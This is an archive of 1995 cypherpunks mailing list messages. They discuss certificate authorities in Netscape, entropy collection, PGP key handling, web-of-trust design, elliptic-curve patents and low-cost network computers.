--- begin forwarded text

From: John Hemming CEO MarketNet <JohnHemming@mkn.co.uk>
Date: Thu, 23 Nov 1995 18:54:36 PM PST
To: www-buyinfo@allegra.att.com
Mime-Version: 1.0
Subject: Netscape V2 and Certificates

We have now spent an interesting time looking at Netscape V2.

If you are interested in looking at V2 and how it relates to certificates
not signed by Verisign please take version 0.15b of Workhorse at
ftp://193.119.26.70/mktnet/pub/horse.zip  (Windows 3.1) switch on
the WWW server and try it out.

Basically the client allows an SSL link to a server "signed" by a CA
that it does not know ("EuroSign") the only problem being that if it
does not know the CA then it cannot check the signature.

I do think this is a major improvement, however, in that it raises
properly the issue of authentication of servers and makes it clear
that the client user should properly consider the server.

At the end of the day the commercial strengths of the server merchant and its
authorisation is more important than who has signed its certificate.  I can
happily obtain certificates for MarketNet even though there is a
US MarketNet Corp.  This is because I have a UK organisation called
MarketNet.  The name, therefore, is not in itself significant.

It is also interesting that Netscape will be checking the domain name in
the near future.  Realistically many people have a large number of
different domain names all pointing at the same server so a generic domain name
is likely to be the most common registration anyway.

At Eurosign.com we will be offering free Certification of a Keypair.  We
wish to ensure that further certification actually means something
commercially viable (eg a Bank regulated by the relevant organisation).
However, as our first offering we will be simply certifying that we have
received valid certificate requests. (they will be short term certs, however)

We have not fully allocated our domain name as yet (as far as I have
been told) although the experimental server (not advised for live use as
there are a number of flaws) was released today.  Eurosign's alpha
test site is at http://193.118.187.106/

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 28 Nov 1995 21:54:10 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511281032.CAA21495@jobe.shell.portal.com>
Message-ID: <199511281340.IAA13518@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone pretending to be Alice has said:
> On Sun, 26 Nov 1995, Perry E. Metzger wrote:
> > Well, signed Alice posts have shown up, so we will just have to assume
> > that the above was a spoof and that the signed Alice posts are the
> > real ones, now won't we?
[...]
> But I will simply repeat, I have never signed a post,

Perhaps *you* have never signed a post, but how do we know who *you*
are. You could be someone we've never heard from before. Anyone could
be putting the Alice de 'nonymous signature on the bottom of something
they've written. The only way to know for sure is digital signatures.

> And I would ask whoever DID post the PGP key under my name, to please
> issue a revocation certificate. 

How do we know you aren't just spoofing us?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 28 Nov 1995 22:19:42 +0800
To: wlkngowl@unix.asb.com
Subject: Re: A random-noise sampling device for DOS
In-Reply-To: <DIr6B1.4yn@news2.new-york.net>
Message-ID: <199511281407.JAA13573@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



wlkngowl@unix.asb.com writes:
> I'm working on a random noise sampling device for DOS, and so far have
> a prototype version that samples the keyboard timings.  I'm unsure of
> a good way to implement it...
> 
> Device timings (and in the future periodic samplings of the mouse
> position or sound-card noise input) are put into a ring-buffer of raw
> data and the output is a straight secure hash of it...  (when the
> output buffer is used it, it just rehashes the data in the buffer at
> the moment...)

Doesn't sound good.

> I'm looking for some advice on how to determine when the raw data has
> been "used up" and worth processing/encrypting before re-hashing it...

What I would suggest is accumulating enough data that you think you
have enough entropy for one hash function's worth of output, hash it,
and put that into an output queue. Then don't reuse the data, or if
you do, reuse it in combination with enough new data that you think
the new data has one hash function output's worth of entropy.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted_Anderson@transarc.com
Date: Tue, 28 Nov 1995 22:31:54 +0800
To: Hal <weidai@eskimo.com>
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>
Message-ID: <okilg2z0BwwMA0mAFp@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


I am far behind in my C'punks reading and am likely to get farther
behind before I catch up, so perhaps this is well-known or dated. 
However, the recent revival of reputation discussion reminded me of a
very interesting claim made by Miller & Drexler in "Comparative Ecology:
A Computational Perspective"
(http://www.webcom.com/~agorics/agorpapers.html).  I'll quote from
section 4: 
> ... Trademarking of services and products enables producers to establish
> valuable reputations. The lack of this mechanism in biology [17]
> contributes to the relative sparseness of symbiosis there. 

> 4.4. Food webs and trade webs 

> Biological and market ecosystems both contain a mixture of symbiotic and
> negative-sum relationships. This paper argues that biological ecosystems
> involve more predation, while idealized market ecosystems involve more
> symbiosis. Indeed, one can make a case that this is so even for human
> market ecosystems-that biological ecosystems are, overall, dominated by
> predation, while market ecosystems are, overall, dominated by symbiosis. 

> In human markets (as in idealized markets) producers within an industry
> compete, but chains of symbiotic trade connect industry to industry.
> Competition in biology likewise occurs most often among those occupying
> the same niche, but here, it is predation that connects from niche to
> niche. Because of the lack of reputations and trademarks, symbiosis in
> biology occurs most often in situations where the "players" find
> themselves in a highly-iterated game. In the extreme, the symbiotic
> system itself becomes so tightly woven that it is considered a single
> organism-as with lichens composed of fungi and algae, or animals
> composed of eukaryotic cells containing mitochondria. Predation, of
> course, links one symbiotic island to the next. 

> Ecology textbooks show networks of predator-prey relationships-called
> food webs-because they are important to understanding ecosystems;
> "symbiosis webs" have found no comparable role. Economics textbooks show
> networks of trading relationships circling the globe; networks of
> predatory or negative-sum relationships have found no comparable role.
> (Even criminal networks typically form cooperative "black markets".) One
> cannot prove the absence of such spanning symbiotic webs in biology, or
> of negative-sum webs in the market; these systems are too complicated
> for any such proof. Instead, the argument here is evolutionary: that the
> concepts which come to dominate an evolved scientific field tend to
> reflect the phenomena which are actually relevant for understanding its
subject matter. 

> [17] Wickler, Wolfgang, Mimicry in Plants and Animals (World University
Library/ MaGraw-Hill, New York, 1968). 

This collection of Miller&Drexler papers is very much worth reading if
you haven't run across it yet. 

Ted 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Tue, 28 Nov 1995 07:15:10 +0800
To: cme@clark.net
Subject: Re: establishing trust
In-Reply-To: <199511270516.AAA05126@clark.net>
Message-ID: <pgpmoose.199511280943.49404@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl M. Ellison wrote:
  Did you intentionally not provide the same key that this was signed with?
  I added the key you provided, but PGP still couldn't find the right key for
  this signature.

I think we've discovered another potential nasty.
I accidentally sent out the SECRET key not the
public key. I believe the problem you suffered was
because it added it to secring not pubring.

No I'm not going to make the passphrase public. I
apologise for any inconvenience to people who
added this to their secring.pgp, it was certainly
not intentional on my part to do this to people.
You should probably delete it.

Greg.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Tue, 28 Nov 1995 23:21:18 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: [NOISE, sorta] Re: Inexpensive Crypto Boxes...
In-Reply-To: <199511280454.WAA00361@einstein.ssz.com>
Message-ID: <9511281504.AA26594@outland>
MIME-Version: 1.0
Content-Type: text/plain



	Hi fellow PSX owner!  Tried WipEouT yet? :)

> The new Sony Play Station is operating under a stripped down Unix.
> Considering the speed that these boxes are designed to run at it seems a
> natural for somebody to come up with a crypto workbench on ROM to install in
> one of these babies. Could program one of the game controller ports as a
> serial port and hook it to a Linux box (for example).

	For those who don't know, the PSX is a CD based gaming console
released (in the US) in Sept by Sony.  It's a MIPS R3000/25MHz processor
with some SGI-designed polygon chips, 2x CD-ROM, 1M RAM, 2M video RAM.

	As for serial port, why bother with the game port when there's
a serial I/O port on the back (the link cable that lets you hook two
PSXen up to play head to head (Mmmmm, Destruction Derby)).  What would be
_really_ spiffy would be for Sony (or a 3rd party) to put out a "hack disk"
(for lack of a better name) that would have a bare bones kernel that you
could then download stuff from another platform (gcc cross-compiled from
your linux box for example).  Like that'll happen.

	The line between toy and real machine is getting more and 
more fuzzy (we use a box here at work with the same processor to compile
for an AT&T telephony switch (which tells you how sad the AT&T product
is :) :))).  How long until the NSA tries a Chinese Lottery attack hidden
inside a Nintendo cart?

	Ah well, I've rambled enough.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rajaram@morgan.com (P. Rajaram)
Date: Tue, 28 Nov 1995 23:39:54 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Certificate Authorities?
In-Reply-To: <01BABCAF.9CDAE5C0@csasaki>
Message-ID: <9511281004.ZM4257@morgan.com>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 27,  4:46pm, Jeff Weinstein wrote:
> Subject: Re: Certificate Authorities?

>   If you want a static list of CAs that netscape products
> will accept, you will be disappointed.  In the future
> there will be more commecial CAs, many companies will run
> their own internal CAs, and information providers will
> provide certs to their subscribers to handle access
> control to their sites.  It is a losing battle to try
> to maintain a static list of CAs.  IMHO, Going with a more
> dynamic, user configurable approach is the only way to
> keep up.

Yes.  But...
I deal with the security infrastructure for a large corporation.
I want only security administrators to configure the list of acceptable CAs.
I specifically do not want our users to be able to add new CAs
to the list of trusted "approved" CAs.

The concern is that some users who are not crypto enthusiasts may be
"social engineered" into adding a very liberal CA to their list.
Once this happens, the browser's signature verification capability
is totally compromised.

This is one of the reasons why PGP has not been adopted by many large
companies.  In response, Viacrypt now seems to have a product that
can restrict user modifications to the public keyring.

-raj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patiwat Panurach <pati@ipied.tu.ac.th>
Date: Tue, 28 Nov 1995 12:25:50 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Money: Back to the Future?
In-Reply-To: <199511250137.CAA12316@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951128111736.25709D-100000@ipied.tu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 Nov 1995, Anonymous wrote:

> money and credit. The Eulopean system of central banks
> has produced an advisory report outlining a possible
> regulatory response, and in this countly some Fed

Does anybody know if this advisory report can be found on the net.

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
--JiuJitsu-CellularPhreaking-SukhotaiHistory-Perl-WWWDataIntegration-Puroresu--







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com
Date: Tue, 28 Nov 1995 21:47:42 +0800
To: cypherpunks@toad.com
Subject: A random-noise sampling device for DOS
Message-ID: <DIr6B1.4yn@news2.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain



I'm working on a random noise sampling device for DOS, and so far have
a prototype version that samples the keyboard timings.  I'm unsure of
a good way to implement it...

Device timings (and in the future periodic samplings of the mouse
position or sound-card noise input) are put into a ring-buffer of raw
data and the output is a straight secure hash of it...  (when the
output buffer is used it, it just rehashes the data in the buffer at
the moment...)

I'm looking for some advice on how to determine when the raw data has
been "used up" and worth processing/encrypting before re-hashing it...

This in mind, offers for eventual beta-testers (annnouncement will
follow when it's ready), or suggestions for features (what to sample,
device interfaces) would be helpful.

Thanks in advance,

Rob <wlkngowl@unix.asb.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patiwat Panurach <pati@ipied.tu.ac.th>
Date: Tue, 28 Nov 1995 20:31:27 +0800
To: John Young <jya@pipeline.com>
Subject: Re: The future will be easy to use (fwd)
In-Reply-To: <199511280309.WAA10578@pipe3.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.951128151201.28240E-100000@ipied.tu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995, John Young wrote:

> >Don't hold your breath. The current market surveys say 
> >that there is no  market for them. Check out this weeks 
> >PC Week or Mac Week, as they both  have several 
> >articles discussing this. Bottem line is that the under 
> >$1000  computer seems to have no future either in 
> >industry or the home.
> 
> Peter Lewis reports in today's NYT on "doubts about the fantasy 
> of a $500 'Network PC' " but quotes Eric Schmidt of Sun saying, 

I was using a Commodore 64 and a 300 bps modem for networking to the old
online services of the day.  That whole setup cost less than 300 dollars
at the time, and had a disk drive too.  I guess it would be feasable to
make a really cheap machine, fit it with a more modern modem and connect
it to the internet.

I feel sad when they say that the market for <1000 $ machines is nill, I 
had so much fun and learned so much from my old machines.

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 29 Nov 1995 05:20:54 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511272224.QAA20539@spirit.sctc.com>
Message-ID: <iP99eD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


zuhn@sctc.com (david d `zoo' zuhn) writes:
> On the technical side, what piece of software do we need for privacy?

One thing that David didn't mention is security add-ons to the "network
computers" that are supposed to be rolled out within the next few months --
the successors to X terminals, $500 boxes with a good screen/sound,
cheap cpu, and a few megs of ram and flash memory to hold a web browser.
I expect some folks to make a good living by writing add-ons (including
crypto add-ons) to these gizmos.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 29 Nov 1995 15:14:47 +0800
To: Carl Ellison <raph@c2.org
Subject: Re: The future will be easy to use
Message-ID: <199511290659.WAA19886@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:03 PM 11/28/95 EST, Carl Ellison wrote:
>That's true.  What the user would have to see is some icon (or, for
>text-bound folks, a temporary unique string) until the user chooses and
>assigns the appropriate alias.  That icon would have no meaning by itself.
>It would acquire a meaning by being associated with some message or set of
>messages:

Better method:  Creator of the key names it:  Usually after himself or
his role:  The recipients key database detects and resolves cases 
where two different keys have identical names in accordance with
certification rules.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 29 Nov 1995 15:21:52 +0800
To: Carl Ellison <raph@c2.org
Subject: Re: The future will be easy to use
Message-ID: <199511290707.XAA24211@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:30 PM 11/28/95 EST, Carl Ellison wrote:
> Of course.  This isn't the base case.  We would have some keys which I sign
> based on my own personal knowledge; things handed to me by people I know;
> some possibly published in the paper where the real key owner would see the
> claim and be able to contest it.

You are making the same erroneous assumption that Phil made when he
designed the Web of trust:  You assume that it is important and 
interesting to link key ID's to physical bodies.  This is usually
not the case:  Linking key ID's to home web pages etc is not only 
easier -- it is also usually more interesting and important.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 1995 03:13:43 +0800
To: cypherpunks@toad.com
Subject: Re: Elliptic curves, patent status?
Message-ID: <199511290717.XAA29808@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
>
> I'm unclear about the patent status of elliptic curve 
> systems. Are they covered by the Diffie-Hellman patent? 
> That is, is the lnguage of this patent broad enough to 
> cover _all_ public-key systems, regardless of their 
> mathematical basis? 

No, but RSA will litigate you with the objective of
inflicting extravagant legal costs regardless.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "(Bill)" <vwbug@iadfw.net>
Date: Wed, 29 Nov 1995 03:43:27 +0800
To: cypherpunks@toad.com
Subject: Who has the right to read your e-mail? Old hash, but I need to ask.
Message-ID: <2.2b7.32.19951128125813.00679628@server.iadfw.net>
MIME-Version: 1.0
Content-Type: text/plain


A recent incident brought this up at work.
If someone could point me to a site that would help explain the in's and out's 
of the laws regarding the following -

Who has the right to read your personal e-mail.
E-mail created at work?
E-mail downdloaded at work?
E-mail stored on a PC at work? 

Thanks 
vwbug@iadfw.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 03:45:22 +0800
To: stevenw@best.com (Steven Weller)
Subject: Re: The future will be easy to use (fwd)
In-Reply-To: <v01530506ace05744708d@[206.86.1.35]>
Message-ID: <199511281329.IAA13468@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Steven Weller writes:
> >Realisticaly, who in their right mind would buy a diskless workstation to
> >connect to Internet?
> 
> The same sort of things could be said of the telephone compared with
> written correspondence. Why would anyone have one in their business or
> home? Anyone can overhear a conversation, people will just chat, the only
> thing you can do with it is talk, there is no record of the correspondence,
> why would anyone want to talk to people on the other side of town? etc.

This is different. In an era of distributed processing, they are
returning you to the mainframe model. I don't see that this can work
very well. Considering how much more powerful a $1000 machine is, why
would you want something half that price that can do one hundredth as
much for you?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 1995 01:09:34 +0800
To: dan@milliways.org (Dan Bailey)
Subject: Re: Elliptic curves, patent status?
Message-ID: <199511291651.IAA20813@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
> > > I'm unclear about the patent status of elliptic curve 
> > > systems. Are they covered by the Diffie-Hellman patent? 
> > > That is, is the lnguage of this patent broad enough to 
> > > cover _all_ public-key systems, regardless of their 
> > > mathematical basis? 

On Mon, 27 Nov 1995 23:16:10 -0800 jamesd@echeque.com wrote:
> > No, but RSA will litigate you with the objective of
> > inflicting extravagant legal costs regardless.

At 08:13 AM 11/29/95 EST, Dan Bailey wrote:
> Does the patent create any headaches for elliptic curve research or
> publishing elliptic curve papers, or just for new products?

Patents do not prohibit research -- Yet.

Patent law continues to be extravagantly re interpreted from time to
time, in a way that continually increases the power of the patent
office and the power of the courts, but this creativity has not 
yet collided drastically with freedom of speech.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 1995 01:39:56 +0800
To: amp <cypherpunks@toad.com>
Subject: Re: The future will be easy to use
Message-ID: <199511291715.JAA04720@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:20 AM 11/30/95 -0500, amp wrote:
>unfortunately, it appears to me that if you _really_ want encryption
>to be universal, it's gotta be done on windoze, it's gotta be
>point-n-click and seamless to the mail application. 

Which, at present, means it's gotta be done on Pegasus.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 1995 01:35:45 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
Message-ID: <199511291715.JAA04769@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>James A. Donald writes

>> Specs, anyone?  > > I suggest a few requirements:  > > Store the
>keys, and information about the keys in a *real* database > ...

At 09:31 AM 11/29/95 -0500, Jack P. Starrantino wrote:
> Is this worth the complexity/cost? I'd have thought that the amount of
> data involved would be small enough that index hashing would be
> overkill, and I can't think of any operations that would require a full
> up db engine.

I think you envisage communicating with a few other revolutionaries,
drug trafficers, etc, whereas I envisage a future where every man is
his own bank and his own credit rating agency.

More immediately, any extension to the web of trust to enable it to
function for anything more interesting and important than
logical-to-physical identity (and who gives a tinkers damn about
logical-to-physical identity) will require a real database, or
will be painful without a real database.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 1995 01:34:57 +0800
To: Carl Ellison <cme@TIS.COM>
Subject: Re: The future will be easy to use
Message-ID: <199511291715.JAA04804@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain





>>At 01:03 PM 11/28/95 EST, Carl Ellison wrote:
>>>That's true.  What the user would have to see is some icon (or, for
>>>text-bound folks, a temporary unique string) until the user chooses and
>>>assigns the appropriate alias.  That icon would have no meaning by itself.
>>>It would acquire a meaning by being associated with some message or set of
>>>messages:

James A. Donald" <jamesd@echeque.com>
>>Better method:  Creator of the key names it

At 10:55 AM 11/29/95 EST, Carl Ellison wrote:
> it
> might also be non-unique, making it worthless as an identifier.

Then your database should detect this non uniqueness, and qualify
the displayed name with additional information, preferably additional
information that helps you address the question of "Is this the
same identity who has changed his key, or is it an accidental
collision, or is it a malevolent spoof?"

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Wed, 29 Nov 1995 01:52:33 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: The future will be easy to use
Message-ID: <v02120d00ace0f66694dc@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:56 PM 11/26/95, James A. Donald wrote:
>At 01:12 PM 11/27/95 -0800, Jonathan Zamick wrote:
>> it
>> means forming a group, made up of Cypherpunk members perhaps, but much
>> smaller, and capable of working together. Also capable of handling not only
>> the theory, but good solid code, GUI, PR, meetings, talking to the
>> government, etc.
>
>Skip the talking to the government bit:  Ignore, do not confront.

I can't agree. The model of a successful enterprise includes feedback from
different levels of participants. Regardless, the government will be taking
a role in encryption. Thus even if they aren't a defining part of the
development, bringing them to a limited extent into the loop, and finding
even small areas which the government would support, helps provide better
buy-in by the government officials who participate, helping the momentum.

The point isn't to bring them into the design, but simply to use their
feedback to optimize our PR approach.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Wed, 29 Nov 1995 00:13:40 +0800
To: perry@piermont.com
Subject: Re: The future will be easy to use (fwd)
Message-ID: <199511281653.KAA23530@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> To:            stevenw@best.com (Steven Weller)
> Cc:            cypherpunks@toad.com
> Subject:       Re: The future will be easy to use (fwd) 
> Reply-to:      perry@piermont.com
> Date:          Tue, 28 Nov 1995 08:29:10 -0500
> From:          "Perry E. Metzger" <perry@piermont.com>

> 
> Steven Weller writes:
> > >Realisticaly, who in their right mind would buy a diskless workstation to
> > >connect to Internet?
> > 
> > The same sort of things could be said of the telephone compared with
> > written correspondence. Why would anyone have one in their business or
> > home? Anyone can overhear a conversation, people will just chat, the only
> > thing you can do with it is talk, there is no record of the correspondence,
> > why would anyone want to talk to people on the other side of town? etc.
> 
> This is different. In an era of distributed processing, they are
> returning you to the mainframe model. I don't see that this can work
> very well. Considering how much more powerful a $1000 machine is, why
> would you want something half that price that can do one hundredth as
> much for you?

I beg to differ.  Even though Larry Ellison's idea is silly, I don't 
see it as returning us to the mainframe model.  Rather, I see it as 
just a small step backwards.  Right now, I've got a 486/DX2-66 with a 
paltry 50 MB HD on my desk at work.  Most of its processing is done 
loading stuff off the LAN and running it locally.  The fact that I 
have a local disk nakes not the slightest bit of difference except a 
boot-time.

If the diskless workstation were to have *no* intelligence 
whatsoever, I'd agree with you.

As to diskless workstations being of no value, again, I'd have to 
disagree.  Diskless workstations, expecially X terminals that have a 
little NVRAM in them, have been rather popular for several years as a 
way to get graphical objects onto people's desks without having to 
shell out a ton of money in the process.  The only reason that 
they're getting less popular is that PC prices have fallen 
dramatically for the past several years, so much so that it's 
cost-effective to put a DX2-66 with 8 MB of RAM and a little disk (or 
no disk at all) on someone's desktop as opposed to something from 
Network General.

Me, I'm waiting for the day that someone gets clever and puts Linux 
into ROM. :)  Java is starting to get really hot, so much so that I 
was telling my spouse that if she wanted to learn Java, she'd have 
steady contracts in the next year or so, even in the sticks of Dallas 
;)  The point is, the market for a cheap, fast PC that will run 
applets *is* there, or will be soon.

I only hope that they make it upgradeable, so *I* can put that 5 GB 
array on it, and beef up the memory without having to take a second 
mortgage to do it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Wed, 29 Nov 1995 00:20:02 +0800
To: cypherpunks@toad.com
Subject: PGP hooks for Pegasus Mail?
Message-ID: <199511281657.KAA23689@khijol>
MIME-Version: 1.0
Content-Type: text/plain


Anyone done anything regarding PGP hooks into Pegasus Mail?  I'm 
running it at home now (SLIPped into my Linux box), and I'd like to 
find a way to integrate PGP into Pegasus Mail.

Thanks in advance for any replies...

-- Ed Carp




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Wed, 29 Nov 1995 02:41:26 +0800
To: perry@piermont.com
Subject: Re: The future will be easy to use
Message-ID: <v02120d02ace0fcab0df8@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:26 AM 11/28/95, Perry E. Metzger wrote:
>Jonathan Zamick writes:
>> I can't agree. The model of a successful enterprise includes feedback from
>> different levels of participants.
>
>This isn't an enterprise. The government is not a participant except
>by their own desire to interfere.
>
>> Regardless, the government will be taking a role in encryption.
>
>What makes you say that? Besides, why would that be desirable on any
>level?
>
>The Government will try to set standards and we will ignore them until
>they try to force them on us by law, period.

This discussion was based on a group of people getting together to create
a new easy to use package for handling keys and such. The government is
going to try to take a dominant stance, and mandate elements of it. That
has to be assumed. Those elements we don't agree with will be ignored or
worked around (depending if its government opinion or government law.)
However, it is possible, even in an antagonistic relationship, to develop
positive feedback. I may be cracked, but I'd like to think that it would
be an advantage to find some area where the government and the Cypherpunk
members do agree, to minimize the conflict over the areas where we don't.

Still, this is getting past the original topic, and gets more into the
religious level of whether there can be any cooperation when the two
sides are Government and Good/Widespread Encryption. My stance is that
currently, no, but that doesn't preclude it in the future. Others don't
see it happening at all, or don't see it worth the investment to achieve.
That is perfectly valid.

---

Returning to the original topic though, do we want to get a smaller list
together to spec out some ideas for the project that was discussed? A
simple, transparent, tool which would allow people to use strong encryption
without having to think about it?

I don't have much time to contribute right now, but I can at least put
together the list, and some ideas.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 29 Nov 1995 00:11:06 +0800
To: ylo@cs.hut.fi
Subject: Re: Intelligence Community Massive Digital Data Systems Initiative
In-Reply-To: <199511272333.PAA12647@comsec.com>
Message-ID: <9511281542.AA09773@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I think the real capacity measure is the number of satellite surveillance
images per day -- at their high resolution.  Anyone know that resolution?

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Thu, 30 Nov 1995 02:15:27 +0800
To: "(Bill)" <cypherpunks@toad.com
Subject: Re: Who has the right to read your e-mail? Old hash, but I need to  ask.
Message-ID: <199511281601.LAA02857@saltmine.radix.net>
